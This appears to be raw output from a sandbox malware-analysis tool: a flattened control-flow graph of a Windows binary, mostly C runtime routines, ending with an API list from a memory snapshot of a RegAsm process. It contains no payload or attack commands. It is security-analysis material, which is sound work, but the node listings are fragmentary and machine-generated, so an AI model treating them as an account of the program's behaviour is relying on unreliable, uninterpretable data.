22436->22437 22444 40bb65 EnterCriticalSection 22437->22444 22439 40ec3d 22440 40ed91 ___scrt_uninitialize_crt 70 API calls 22439->22440 22441 40ec4e 22440->22441 22445 40ec77 22441->22445 22444->22439 22448 40bb79 LeaveCriticalSection 22445->22448 22447 40ec60 22447->22427 22448->22447 18445 407294 18446 4072a0 ___scrt_is_nonwritable_in_current_image 18445->18446 18471 407505 18446->18471 18448 4072a7 18449 407400 18448->18449 18459 4072d1 ___scrt_is_nonwritable_in_current_image _unexpected ___scrt_release_startup_lock 18448->18459 18505 407b01 IsProcessorFeaturePresent 18449->18505 18451 407407 18486 4115b3 18451->18486 18454 411577 _unexpected 23 API calls 18455 407415 18454->18455 18456 4072f0 18457 407371 18479 4111f1 18457->18479 18459->18456 18459->18457 18489 41158d 18459->18489 18461 407377 18483 403ee0 CreateThread WaitForSingleObject 18461->18483 18466 40739c 18467 4073a5 18466->18467 18496 411568 18466->18496 18499 407676 18467->18499 18472 40750e 18471->18472 18509 4077e0 IsProcessorFeaturePresent 18472->18509 18476 40751f 18478 407523 18476->18478 18519 40a5ad 18476->18519 18478->18448 18480 4111ff 18479->18480 18481 4111fa 18479->18481 18480->18461 18579 410f4b 18481->18579 18484 407420 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 18483->18484 18847 4038c0 18483->18847 18485 403f22 18484->18485 18494 407c21 GetModuleHandleW 18485->18494 18487 41139b _unexpected 23 API calls 18486->18487 18488 40740d 18487->18488 18488->18454 18490 4115a3 __dosmaperr 18489->18490 18493 4107b4 ___scrt_is_nonwritable_in_current_image 18489->18493 18490->18457 18491 41513b __Getctype 41 API calls 18491->18493 18492 40e13c CallUnexpected 41 API calls 18492->18493 18493->18489 18493->18491 18493->18492 18495 407398 18494->18495 18495->18451 18495->18466 18497 41139b _unexpected 23 API calls 18496->18497 18498 411573 18497->18498 18498->18467 18500 407682 18499->18500 18501 4073ae 18500->18501 19889 413370 18500->19889 18501->18456 18503 407690 18504 40a5ad ___scrt_uninitialize_crt 7 API calls 18503->18504 18504->18501 18506 407b17 _unexpected codecvt 18505->18506 18507 407bc2 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 18506->18507 18508 407c0d _unexpected 18507->18508 18508->18451 18510 40751a 18509->18510 18511 40a58e 18510->18511 18525 40b667 18511->18525 18515 40a59f 18516 40a5aa 18515->18516 18539 40b6a3 18515->18539 18516->18476 18518 40a597 18518->18476 18520 40a5c0 18519->18520 18521 40a5b6 18519->18521 18520->18478 18522 40a726 ___vcrt_uninitialize_ptd 6 API calls 18521->18522 18523 40a5bb 18522->18523 18524 40b6a3 ___vcrt_uninitialize_locks DeleteCriticalSection 18523->18524 18524->18520 18526 40b670 18525->18526 18528 40b699 18526->18528 18529 40a593 18526->18529 18543 40b8ac 18526->18543 18530 40b6a3 ___vcrt_uninitialize_locks DeleteCriticalSection 18528->18530 18529->18518 18531 40a6f3 18529->18531 18530->18529 18560 40b7bd 18531->18560 18534 40a708 18534->18515 18537 40a723 18537->18515 18540 40b6cd 18539->18540 18541 40b6ae 18539->18541 18540->18518 18542 40b6b8 DeleteCriticalSection 18541->18542 18542->18540 18542->18542 18548 40b6d2 18543->18548 18546 40b8e4 InitializeCriticalSectionAndSpinCount 18547 40b8cf 18546->18547 18547->18526 18549 40b6f3 18548->18549 18550 40b6ef 18548->18550 18549->18550 18551 40b75b GetProcAddress 18549->18551 18553 40b74c 18549->18553 18555 40b772 LoadLibraryExW 18549->18555 18550->18546 18550->18547 18551->18550 18553->18551 18554 40b754 FreeLibrary 18553->18554 18554->18551 18556 40b789 GetLastError 18555->18556 18557 40b7b9 18555->18557 18556->18557 18558 40b794 ___vcrt_InitializeCriticalSectionEx 18556->18558 18557->18549 18558->18557 18559 40b7aa LoadLibraryExW 18558->18559 18559->18549 18561 40b6d2 ___vcrt_InitializeCriticalSectionEx 5 API calls 18560->18561 18562 40b7d7 18561->18562 18563 40b7f0 TlsAlloc 18562->18563 18564 40a6fd 18562->18564 18564->18534 18565 40b86e 18564->18565 18566 40b6d2 ___vcrt_InitializeCriticalSectionEx 5 API calls 18565->18566 18567 40b888 18566->18567 18568 40b8a3 TlsSetValue 18567->18568 18569 40a716 18567->18569 18568->18569 18569->18537 18570 40a726 18569->18570 18571 40a730 18570->18571 18572 40a736 18570->18572 18574 40b7f8 18571->18574 18572->18534 18575 40b6d2 ___vcrt_InitializeCriticalSectionEx 5 API calls 18574->18575 18576 40b812 18575->18576 18577 40b82a TlsFree 18576->18577 18578 40b81e 18576->18578 18577->18578 18578->18572 18580 410f54 18579->18580 18583 410f6a 18579->18583 18580->18583 18585 410f77 18580->18585 18582 410f61 18582->18583 18602 4110e2 18582->18602 18583->18480 18586 410f80 18585->18586 18587 410f83 18585->18587 18586->18582 18610 41c13b 18587->18610 18592 410fa0 18638 410fd1 18592->18638 18593 410f94 18594 4140f1 ___free_lconv_mon 14 API calls 18593->18594 18596 410f9a 18594->18596 18596->18582 18598 4140f1 ___free_lconv_mon 14 API calls 18599 410fc4 18598->18599 18600 4140f1 ___free_lconv_mon 14 API calls 18599->18600 18601 410fca 18600->18601 18601->18582 18603 411153 18602->18603 18604 4110f1 18602->18604 18603->18583 18604->18603 18605 414094 __dosmaperr 14 API calls 18604->18605 18607 41b08b WideCharToMultiByte _Fputc 18604->18607 18608 411157 18604->18608 18609 4140f1 ___free_lconv_mon 14 API calls 18604->18609 18605->18604 18606 4140f1 ___free_lconv_mon 14 API calls 18606->18603 18607->18604 18608->18606 18609->18604 18611 410f89 18610->18611 18612 41c144 18610->18612 18616 41c43d GetEnvironmentStringsW 18611->18616 18660 4151f6 18612->18660 18617 41c455 18616->18617 18618 410f8e 18616->18618 18619 41b08b _Fputc WideCharToMultiByte 18617->18619 18618->18592 18618->18593 18620 41c472 18619->18620 18621 41c487 18620->18621 18622 41c47c FreeEnvironmentStringsW 18620->18622 18623 415426 std::_Locinfo::_Locinfo_dtor 15 API calls 18621->18623 18622->18618 18624 41c48e 18623->18624 18625 41c4a7 18624->18625 18626 41c496 18624->18626 18628 41b08b _Fputc WideCharToMultiByte 18625->18628 18627 4140f1 ___free_lconv_mon 14 API calls 18626->18627 18629 41c49b FreeEnvironmentStringsW 18627->18629 18630 41c4b7 18628->18630 18631 41c4d8 18629->18631 18632 41c4c6 18630->18632 18633 41c4be 18630->18633 18631->18618 18635 4140f1 ___free_lconv_mon 14 API calls 18632->18635 18634 4140f1 ___free_lconv_mon 14 API calls 18633->18634 18636 41c4c4 FreeEnvironmentStringsW 18634->18636 18635->18636 18636->18631 18639 410fe6 18638->18639 18640 414094 __dosmaperr 14 API calls 18639->18640 18641 41100d 18640->18641 18642 411015 18641->18642 18651 41101f 18641->18651 18643 4140f1 ___free_lconv_mon 14 API calls 18642->18643 18659 410fa7 18643->18659 18644 41107c 18645 4140f1 ___free_lconv_mon 14 API calls 18644->18645 18645->18659 18646 414094 __dosmaperr 14 API calls 18646->18651 18647 41108b 18841 4110b3 18647->18841 18651->18644 18651->18646 18651->18647 18653 4110a6 18651->18653 18655 4140f1 ___free_lconv_mon 14 API calls 18651->18655 18832 4133ff 18651->18832 18652 4140f1 ___free_lconv_mon 14 API calls 18654 411098 18652->18654 18656 40dfa1 __Getctype 11 API calls 18653->18656 18657 4140f1 ___free_lconv_mon 14 API calls 18654->18657 18655->18651 18658 4110b2 18656->18658 18657->18659 18659->18598 18661 415201 18660->18661 18662 415207 18660->18662 18664 4145dd __dosmaperr 6 API calls 18661->18664 18663 41461c __dosmaperr 6 API calls 18662->18663 18682 41520d 18662->18682 18665 415221 18663->18665 18664->18662 18666 414094 __dosmaperr 14 API calls 18665->18666 18665->18682 18668 415231 18666->18668 18667 40e13c CallUnexpected 41 API calls 18669 41528b 18667->18669 18670 415239 18668->18670 18671 41524e 18668->18671 18673 41461c __dosmaperr 6 API calls 18670->18673 18672 41461c __dosmaperr 6 API calls 18671->18672 18674 41525a 18672->18674 18677 415245 18673->18677 18675 41526d 18674->18675 18676 41525e 18674->18676 18679 414f69 __dosmaperr 14 API calls 18675->18679 18678 41461c __dosmaperr 6 API calls 18676->18678 18680 4140f1 ___free_lconv_mon 14 API calls 18677->18680 18678->18677 18681 415278 18679->18681 18680->18682 18683 4140f1 ___free_lconv_mon 14 API calls 18681->18683 18682->18667 18684 415212 18682->18684 18683->18684 18685 41bf46 18684->18685 18686 41c09b __wsopen_s 41 API calls 18685->18686 18687 41bf70 18686->18687 18708 41bcc6 18687->18708 18690 41bf89 18690->18611 18691 415426 std::_Locinfo::_Locinfo_dtor 15 API calls 18692 41bf9a 18691->18692 18693 41bfb0 18692->18693 18694 41bfa2 18692->18694 18715 41c196 18693->18715 18695 4140f1 ___free_lconv_mon 14 API calls 18694->18695 18695->18690 18698 41bfe8 18699 40e072 __dosmaperr 14 API calls 18698->18699 18700 41bfed 18699->18700 18702 4140f1 ___free_lconv_mon 14 API calls 18700->18702 18701 41c02f 18704 41c078 18701->18704 18726 41bbb8 18701->18726 18702->18690 18703 41c003 18703->18701 18707 4140f1 ___free_lconv_mon 14 API calls 18703->18707 18706 4140f1 ___free_lconv_mon 14 API calls 18704->18706 18706->18690 18707->18701 18709 40fc60 __wsopen_s 41 API calls 18708->18709 18710 41bcd8 18709->18710 18711 41bce7 GetOEMCP 18710->18711 18712 41bcf9 18710->18712 18714 41bd10 18711->18714 18713 41bcfe GetACP 18712->18713 18712->18714 18713->18714 18714->18690 18714->18691 18716 41bcc6 43 API calls 18715->18716 18718 41c1b6 18716->18718 18717 41c22f codecvt 18720 407420 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 18717->18720 18718->18717 18719 41c1f3 IsValidCodePage 18718->18719 18719->18717 18721 41c205 18719->18721 18722 41bfdd 18720->18722 18723 41c234 GetCPInfo 18721->18723 18725 41c20e codecvt 18721->18725 18722->18698 18722->18703 18723->18717 18723->18725 18734 41bd9a 18725->18734 18727 41bbc4 ___scrt_is_nonwritable_in_current_image 18726->18727 18806 40e0c6 EnterCriticalSection 18727->18806 18729 41bbce 18807 41bc05 18729->18807 18735 41bdc2 GetCPInfo 18734->18735 18736 41be8b 18734->18736 18735->18736 18739 41bdda 18735->18739 18738 407420 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 18736->18738 18741 41bf44 18738->18741 18745 418da8 18739->18745 18741->18717 18746 40fc60 __wsopen_s 41 API calls 18745->18746 18747 418dc8 18746->18747 18748 41b00f __wsopen_s MultiByteToWideChar 18747->18748 18752 418df5 18748->18752 18749 418e8c 18751 407420 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 18749->18751 18750 418e84 18765 40716c 18750->18765 18753 418eaf 18751->18753 18752->18749 18752->18750 18755 415426 std::_Locinfo::_Locinfo_dtor 15 API calls 18752->18755 18756 418e1a __alloca_probe_16 codecvt 18752->18756 18760 41909f 18753->18760 18755->18756 18756->18750 18757 41b00f __wsopen_s MultiByteToWideChar 18756->18757 18758 418e65 18757->18758 18758->18750 18759 418e70 GetStringTypeW 18758->18759 18759->18750 18761 40fc60 __wsopen_s 41 API calls 18760->18761 18766 407176 18765->18766 18767 407187 18765->18767 18766->18767 18769 40dd34 18766->18769 18767->18749 18770 4140f1 ___free_lconv_mon 14 API calls 18769->18770 18806->18729 18817 410178 18807->18817 18809 41bc27 18810 410178 41 API calls 18809->18810 18811 41bc46 18810->18811 18812 41bbdb 18811->18812 18813 4140f1 ___free_lconv_mon 14 API calls 18811->18813 18813->18812 18818 410189 18817->18818 18826 410185 codecvt 18817->18826 18819 410190 18818->18819 18820 4101a3 codecvt 18818->18820 18821 40e072 __dosmaperr 14 API calls 18819->18821 18824 4101d1 18820->18824 18825 4101da 18820->18825 18820->18826 18822 410195 18821->18822 18823 40df74 _Ungetc 41 API calls 18822->18823 18823->18826 18827 40e072 __dosmaperr 14 API calls 18824->18827 18825->18826 18829 40e072 __dosmaperr 14 API calls 18825->18829 18826->18809 18828 4101d6 18827->18828 18829->18828 18833 41340d 18832->18833 18834 41341b 18832->18834 18833->18834 18839 413433 18833->18839 18835 40e072 __dosmaperr 14 API calls 18834->18835 18836 413423 18835->18836 18837 40df74 _Ungetc 41 API calls 18836->18837 18838 41342d 18837->18838 18838->18651 18839->18838 18840 40e072 __dosmaperr 14 API calls 18839->18840 18840->18836 18842 4110c0 18841->18842 18843 411091 18841->18843 18844 4110d7 18842->18844 18846 4140f1 ___free_lconv_mon 14 API calls 18842->18846 18843->18652 18845 4140f1 ___free_lconv_mon 14 API calls 18844->18845 18845->18843 18846->18842 18886 40742e 18847->18886 18849 4038e3 error_info_injector 18850 403902 LoadLibraryW 18849->18850 18896 402320 18850->18896 18888 407433 18886->18888 18889 40744d 18888->18889 18890 412e98 std::ios_base::_Init 2 API calls 18888->18890 18892 40744f std::ios_base::_Init 18888->18892 18982 40e180 18888->18982 18889->18849 18890->18888 18891 407f8e std::ios_base::_Init 18893 408090 CallUnexpected RaiseException 18891->18893 18892->18891 18991 408090 18892->18991 18895 407fab 18893->18895 18899 402368 error_info_injector 18896->18899 18903 4036c0 error_info_injector 18896->18903 18897 407420 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 18898 403723 18897->18898 18907 401fd0 18898->18907 18900 404390 std::ios_base::_Init 43 API calls 18899->18900 18902 4036c2 18899->18902 18899->18903 18904 403727 18899->18904 18994 401110 18899->18994 18900->18899 18902->18903 18902->18904 18903->18897 18998 40df84 18904->18998 19225 403fc0 18907->19225 18983 415426 18982->18983 18984 415464 18983->18984 18986 41544f HeapAlloc 18983->18986 18989 415438 __dosmaperr 18983->18989 18985 40e072 __dosmaperr 14 API calls 18984->18985 18987 415469 18985->18987 18988 415462 18986->18988 18986->18989 18987->18888 18988->18987 18989->18984 18989->18986 18990 412e98 std::ios_base::_Init 2 API calls 18989->18990 18990->18989 18992 4080d7 RaiseException 18991->18992 18993 4080aa 18991->18993 18992->18891 18993->18992 18995 401122 18994->18995 19003 40d98e 18995->19003 18999 40dec0 _Ungetc 41 API calls 18998->18999 19000 40df93 18999->19000 19001 40dfa1 __Getctype 11 API calls 19000->19001 19002 40dfa0 19001->19002 19004 40d9a2 _Fputc 19003->19004 19005 40d9c4 19004->19005 19007 40d9eb 19004->19007 19006 40def7 _Fputc 41 API calls 19005->19006 19009 40d9df 19006->19009 19012 40bdc9 19007->19012 19010 40bbd5 _Fputc 41 API calls 19009->19010 19011 40113c 19010->19011 19011->18899 19013 40bdd5 ___scrt_is_nonwritable_in_current_image 19012->19013 19020 40bb65 EnterCriticalSection 19013->19020 19015 40bde3 19021 40c97a 19015->19021 19020->19015 19035 4163d8 19021->19035 19023 40c9a1 19044 40cb85 19023->19044 19030 407420 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 19031 40bdf0 19030->19031 19066 41639d 19035->19066 19037 4163e9 19038 416462 19037->19038 19039 416439 19037->19039 19038->19023 19040 415426 std::_Locinfo::_Locinfo_dtor 15 API calls 19039->19040 19041 416443 19040->19041 19042 4140f1 ___free_lconv_mon 14 API calls 19041->19042 19043 41644c 19042->19043 19043->19038 19079 40d7a6 19044->19079 19047 40cbae 19048 40def7 _Fputc 41 API calls 19047->19048 19049 40c9e8 19048->19049 19059 40c93c 19049->19059 19052 40d730 _Fputc 41 API calls 19054 40cbd9 std::_Locinfo::_Locinfo_dtor 19052->19054 19054->19049 19054->19052 19055 40cdb6 19054->19055 19085 40cb0d 19054->19085 19088 40ce31 19054->19088 19122 40cf8f 19054->19122 19056 40def7 _Fputc 41 API calls 19055->19056 19057 40cdd2 19056->19057 19058 40def7 _Fputc 41 API calls 19057->19058 19058->19049 19060 4140f1 ___free_lconv_mon 14 API calls 19059->19060 19061 40c94c 19060->19061 19062 416484 19061->19062 19063 40ca02 19062->19063 19064 41648f 19062->19064 19063->19030 19064->19063 19218 40ed28 19064->19218 19067 4163a9 19066->19067 19068 4163ca 19067->19068 19072 414bd2 19067->19072 19068->19037 19070 4163c4 19071 421bd0 __wsopen_s 41 API calls 19070->19071 19071->19068 19073 414bf3 19072->19073 19074 414bde 19072->19074 19073->19070 19075 40e072 __dosmaperr 14 API calls 19074->19075 19076 414be3 19075->19076 19077 40df74 _Ungetc 41 API calls 19076->19077 19078 414bee 19077->19078 19078->19070 19080 40d7b1 19079->19080 19081 40d7d3 19079->19081 19082 40def7 _Fputc 41 API calls 19080->19082 19151 40d7de 19081->19151 19084 40cba0 19082->19084 19084->19047 19084->19049 19084->19054 19159 40bf1f 19085->19159 19087 40cb48 19087->19054 19089 40ce38 19088->19089 19090 40ce4f 19088->19090 19092 40ce8e 19089->19092 19093 40cfb3 19089->19093 19094 40d024 19089->19094 19091 40def7 _Fputc 41 API calls 19090->19091 19090->19092 19095 40ce83 19091->19095 19092->19054 19096 40d051 19093->19096 19097 40cfb9 19093->19097 19098 40d077 19094->19098 19099 40d029 19094->19099 19095->19054 19188 40c2c9 19096->19188 19105 40cff6 19097->19105 19109 40cfbf 19097->19109 19098->19096 19098->19105 19121 40cfdb 19098->19121 19100 40d06b 19099->19100 19101 40d02b 19099->19101 19205 40d645 19100->19205 19103 40d030 19101->19103 19104 40cfcd 19101->19104 19103->19096 19108 40d035 19103->19108 19120 40cfef 19104->19120 19104->19121 19195 40d385 19104->19195 19105->19120 19169 40c446 19105->19169 19107 40d00b 19107->19120 19176 40d50f 19107->19176 19109->19104 19109->19107 19109->19121 19115 407420 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 19120->19115 19121->19120 19208 41607a 19121->19208 19123 40cfb3 19122->19123 19124 40d024 19122->19124 19125 40d051 19123->19125 19126 40cfb9 19123->19126 19127 40d077 19124->19127 19128 40d029 19124->19128 19134 40c2c9 42 API calls 19125->19134 19133 40cff6 19126->19133 19137 40cfbf 19126->19137 19127->19125 19127->19133 19149 40cfdb 19127->19149 19129 40d06b 19128->19129 19130 40d02b 19128->19130 19132 40d645 42 API calls 19129->19132 19131 40d030 19130->19131 19142 40cfcd 19130->19142 19131->19125 19135 40d035 19131->19135 19132->19149 19141 40c446 42 API calls 19133->19141 19150 40cfef 19133->19150 19134->19149 19139 40d048 19135->19139 19140 40d03a 19135->19140 19136 40d00b 19144 40d50f 43 API calls 19136->19144 19136->19150 19137->19136 19137->19142 19137->19149 19138 40d385 44 API calls 19138->19149 19140->19150 19141->19149 19142->19138 19142->19149 19142->19150 19144->19149 19145 407420 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 19146 40d2d5 19145->19146 19146->19054 19148 41607a _Fputc 43 API calls 19148->19149 19149->19148 19149->19150 19150->19145 19152 40d7f2 19151->19152 19158 40d85c 19151->19158 19153 414bd2 _Ungetc 41 API calls 19152->19153 19154 40d7f9 19153->19154 19155 40e072 __dosmaperr 14 API calls 19154->19155 19154->19158 19156 40d851 19155->19156 19157 40df74 _Ungetc 41 API calls 19156->19157 19157->19158 19158->19084 19160 40d78b std::_Locinfo::_Locinfo_dtor 41 API calls 19159->19160 19161 40bf31 19160->19161 19162 40bf46 19161->19162 19165 40bf79 19161->19165 19168 40bf61 std::_Locinfo::_Locinfo_dtor 19161->19168 19163 40def7 _Fputc 41 API calls 19162->19163 19163->19168 19164 40c010 19166 40d6cc 41 API calls 19164->19166 19165->19164 19167 40d6cc 41 API calls 19165->19167 19166->19168 19167->19164 19168->19087 19170 40c45a 19169->19170 19189 40c2dd 19188->19189 19190 40c326 19189->19190 19191 40c2ff 19189->19191 19206 40c446 42 API calls 19205->19206 19210 41608f 19208->19210 19219 40ed41 19218->19219 19220 40ed68 19218->19220 19219->19220 19220->19063 19226 404002 19225->19226 19226->19226 19295 404700 19226->19295 19228 40405c 19230 404b20 72 API calls 19228->19230 19234 404062 std::ios_base::_Ios_base_dtor 19228->19234 19230->19234 19231 404256 19232 401fff 19231->19232 19310 404a90 19231->19310 19235 404b20 19232->19235 19300 401f00 19234->19300 19418 405474 19235->19418 19238 405474 std::_Lockit::_Lockit 7 API calls 19239 404b6e 19238->19239 19243 4054cc std::_Lockit::~_Lockit 2 API calls 19239->19243 19240 404bb1 19424 4054cc 19240->19424 19242 404b92 19242->19240 19246 40742e std::ios_base::_Init 16 API calls 19242->19246 19243->19242 19244 404bbd 19245 407420 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 19244->19245 19247 402020 19245->19247 19248 404c03 19246->19248 19278 404890 19247->19278 19249 405474 std::_Lockit::_Lockit 7 API calls 19248->19249 19250 404c2f 19249->19250 19251 404d98 19250->19251 19252 404c79 19250->19252 19469 40561e 19251->19469 19431 4058aa 19252->19431 19279 404700 43 API calls 19278->19279 19281 4048ce 19279->19281 19280 401f00 std::ios_base::_Init 43 API calls 19281->19280 19297 40471c 19295->19297 19296 404730 19296->19228 19297->19296 19298 404780 43 API calls 19297->19298 19299 40474f 19298->19299 19299->19228 19301 401f1a 19300->19301 19301->19231 19302 408090 CallUnexpected RaiseException 19301->19302 19303 401f32 std::ios_base::_Init 19301->19303 19302->19303 19314 401e50 19303->19314 19311 404af3 19310->19311 19312 404ace 19310->19312 19311->19232 19312->19311 19415 404a00 19312->19415 19315 401e90 19314->19315 19315->19315 19316 404390 std::ios_base::_Init 43 API calls 19315->19316 19317 401ea6 19316->19317 19339 4013b0 19317->19339 19320 401eb7 19340 4013f3 19339->19340 19341 401641 19340->19341 19344 401408 19340->19344 19392 4012d0 19341->19392 19343 401646 19345 40df84 std::ios_base::_Init 41 API calls 19343->19345 19348 401415 codecvt 19344->19348 19363 404a40 19344->19363 19347 40164b 19345->19347 19350 40df84 std::ios_base::_Init 41 API calls 19347->19350 19349 401490 19348->19349 19377 404560 19348->19377 19355 404560 std::ios_base::_Init 43 API calls 19349->19355 19356 40150a codecvt 19349->19356 19351 401650 19350->19351 19397 40804e 19351->19397 19355->19356 19356->19343 19357 401580 error_info_injector 19356->19357 19358 407feb ___std_exception_copy 42 API calls 19357->19358 19359 4015dc 19358->19359 19359->19347 19360 40160d error_info_injector 19359->19360 19361 407420 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 19360->19361 19362 40163b 19361->19362 19362->19320 19364 404a4b 19363->19364 19365 404a6d 19363->19365 19366 404a82 19364->19366 19367 404a52 19364->19367 19368 404a7d 19365->19368 19371 40742e std::ios_base::_Init 16 API calls 19365->19371 19401 401250 19366->19401 19370 40742e std::ios_base::_Init 16 API calls 19367->19370 19368->19348 19372 404a58 19370->19372 19373 404a77 19371->19373 19374 40df84 std::ios_base::_Init 41 API calls 19372->19374 19375 404a61 19372->19375 19373->19348 19376 404a8c 19374->19376 19375->19348 19378 4046b0 19377->19378 19379 404587 19377->19379 19380 4012d0 std::ios_base::_Init 43 API calls 19378->19380 19382 4045f6 19379->19382 19383 4045e9 19379->19383 19385 4045a0 19379->19385 19381 4046b5 19380->19381 19384 401250 std::ios_base::_Init 43 API calls 19381->19384 19388 40742e std::ios_base::_Init 16 API calls 19382->19388 19390 4045b0 codecvt 19382->19390 19383->19381 19383->19385 19384->19390 19386 40742e std::ios_base::_Init 16 API calls 19385->19386 19386->19390 19387 40df84 std::ios_base::_Init 41 API calls 19389 4046bf 19387->19389 19388->19390 19390->19387 19391 404669 error_info_injector codecvt 19390->19391 19391->19349 19407 4055de 19392->19407 19398 408062 19397->19398 19399 40805b 19397->19399 19402 40125b std::ios_base::_Init 19401->19402 19403 408090 CallUnexpected RaiseException 19402->19403 19404 40126a 19403->19404 19405 407feb ___std_exception_copy 42 API calls 19404->19405 19406 401291 19405->19406 19406->19372 19412 40551e 19407->19412 19410 408090 CallUnexpected RaiseException 19411 4055fd 19410->19411 19413 401150 std::invalid_argument::invalid_argument 42 API calls 19412->19413 19414 405530 19413->19414 19414->19410 19416 401f00 std::ios_base::_Init 43 API calls 19415->19416 19417 404a1f 19416->19417 19417->19311 19419 405483 19418->19419 19420 40548a 19418->19420 19474 40e125 19419->19474 19422 404b51 19420->19422 19479 406f3c EnterCriticalSection 19420->19479 19422->19238 19422->19242 19425 40e133 19424->19425 19426 4054d6 19424->19426 19529 40e10e LeaveCriticalSection 19425->19529 19427 4054e9 19426->19427 19528 406f4a LeaveCriticalSection 19426->19528 19427->19244 19430 40e13a 19430->19244 19530 40e3e0 19431->19530 19674 405592 19469->19674 19480 414874 19474->19480 19479->19422 19481 4141e3 std::_Lockit::_Lockit 5 API calls 19480->19481 19482 414879 19481->19482 19501 4141fd 19482->19501 19502 4143cc __dosmaperr 5 API calls 19501->19502 19503 414213 19502->19503 19504 414217 19503->19504 19505 4143cc __dosmaperr 5 API calls 19504->19505 19506 41422d 19505->19506 19507 414231 19506->19507 19508 4143cc __dosmaperr 5 API calls 19507->19508 19509 414247 19508->19509 19528->19427 19529->19430 19531 414874 std::_Lockit::_Lockit 5 API calls 19530->19531 19532 40e3ed 19531->19532 19541 40e18b 19532->19541 19542 40e197 ___scrt_is_nonwritable_in_current_image 19541->19542 19677 401150 19674->19677 19678 407feb ___std_exception_copy 42 API calls 19677->19678 19679 401188 19678->19679 19680 407420 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 19679->19680 19890 41337b 19889->19890 19892 41338d ___scrt_uninitialize_crt 19889->19892 19891 413389 19890->19891 19894 40edf6 19890->19894 19891->18503 19892->18503 19897 40ec83 19894->19897 19900 40eb77 19897->19900 19901 40eb83 ___scrt_is_nonwritable_in_current_image 19900->19901 19908 40e0c6 EnterCriticalSection 19901->19908 19903 40ebf9 19917 40ec17 19903->19917 19906 40eb8d ___scrt_uninitialize_crt 19906->19903 19909 40eaeb 19906->19909 19908->19906 19910 40eaf7 ___scrt_is_nonwritable_in_current_image 19909->19910 19920 40bb65 EnterCriticalSection 19910->19920 19912 40eb01 ___scrt_uninitialize_crt 19913 40eb3a 19912->19913 19921 40ed91 19912->19921 19934 40eb6b 19913->19934 19966 40e10e LeaveCriticalSection 19917->19966 19919 40ec05 19919->19891 19920->19912 19922 40eda6 _Fputc 19921->19922 19923 40edb8 19922->19923 19924 40edad 19922->19924 19926 40ed28 ___scrt_uninitialize_crt 66 API calls 19923->19926 19925 40ec83 ___scrt_uninitialize_crt 70 API calls 19924->19925 19927 40edb3 19925->19927 19928 40edc2 19926->19928 19929 40bbd5 _Fputc 41 API calls 19927->19929 19928->19927 19931 414bd2 _Ungetc 41 API calls 19928->19931 19930 40edf0 19929->19930 19930->19913 19932 40edd9 19931->19932 19937 418203 19932->19937 19965 40bb79 LeaveCriticalSection 19934->19965 19936 40eb59 19936->19906 19938 418214 19937->19938 19940 418221 19937->19940 19939 40e072 __dosmaperr 14 API calls 19938->19939 19947 418219 19939->19947 19941 41826a 19940->19941 19943 418248 19940->19943 19942 40e072 __dosmaperr 14 API calls 19941->19942 19944 41826f 19942->19944 19948 418161 19943->19948 19946 40df74 _Ungetc 41 API calls 19944->19946 19946->19947 19947->19927 19949 41816d ___scrt_is_nonwritable_in_current_image 19948->19949 19961 41c9b3 EnterCriticalSection 19949->19961 19951 41817c 19952 41cc2f __wsopen_s 41 API calls 19951->19952 19960 4181c1 19951->19960 19954 4181a8 FlushFileBuffers 19952->19954 19953 40e072 __dosmaperr 14 API calls 19955 4181c8 19953->19955 19954->19955 19956 4181b4 GetLastError 19954->19956 19962 4181f7 19955->19962 19958 40e05f __dosmaperr 14 API calls 19956->19958 19958->19960 19960->19953 19961->19951 19965->19936 19966->19919 22624 40679d 22625 4067ac 22624->22625 22627 4067d0 22625->22627 22628 40f516 22625->22628 22629 40f529 _Fputc 22628->22629 22634 40f44d 22629->22634 22631 40f53e 22632 40bbd5 _Fputc 41 API calls 22631->22632 22633 40f54b 22632->22633 22633->22627 22635 40f482 22634->22635 22636 40f45f 22634->22636 22635->22636 22639 40f4a9 22635->22639 22637 40def7 _Fputc 41 API calls 22636->22637 22638 40f47a 22637->22638 22638->22631 22642 40f352 22639->22642 22643 40f35e ___scrt_is_nonwritable_in_current_image 22642->22643 22650 40bb65 EnterCriticalSection 22643->22650 22645 40f36c 22651 40f3ad 22645->22651 22647 40f379 22660 40f3a1 22647->22660 22650->22645 22652 40ed28 ___scrt_uninitialize_crt 66 API calls 22651->22652 22653 40f3c8 22652->22653 22654 4149a0 14 API calls 22653->22654 22655 40f3d2 22654->22655 22656 414094 __dosmaperr 14 API calls 22655->22656 22657 40f3ed 22655->22657 22658 40f411 22656->22658 22657->22647 22659 4140f1 ___free_lconv_mon 14 API calls 22658->22659 22659->22657 22663 40bb79 LeaveCriticalSection 22660->22663 22662 40f38a 22662->22631 22663->22662

                                                                            Control-flow Graph

                                                                            APIs
                                                                              • Part of subcall function 0041FB65: CreateFileW.KERNELBASE(?,00000000,?,0041FF58,?,?,00000000,?,0041FF58,?,0000000C), ref: 0041FB82
                                                                            • GetLastError.KERNEL32 ref: 0041FFC3
                                                                            • __dosmaperr.LIBCMT ref: 0041FFCA
                                                                            • GetFileType.KERNELBASE(00000000), ref: 0041FFD6
                                                                            • GetLastError.KERNEL32 ref: 0041FFE0
                                                                            • __dosmaperr.LIBCMT ref: 0041FFE9
                                                                            • CloseHandle.KERNEL32(00000000), ref: 00420009
                                                                            • CloseHandle.KERNEL32(?), ref: 00420156
                                                                            • GetLastError.KERNEL32 ref: 00420188
                                                                            • __dosmaperr.LIBCMT ref: 0042018F
                                                                            Memory Dump Source
                                                                            • Source File: 0000000D.00000002.2744142845.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
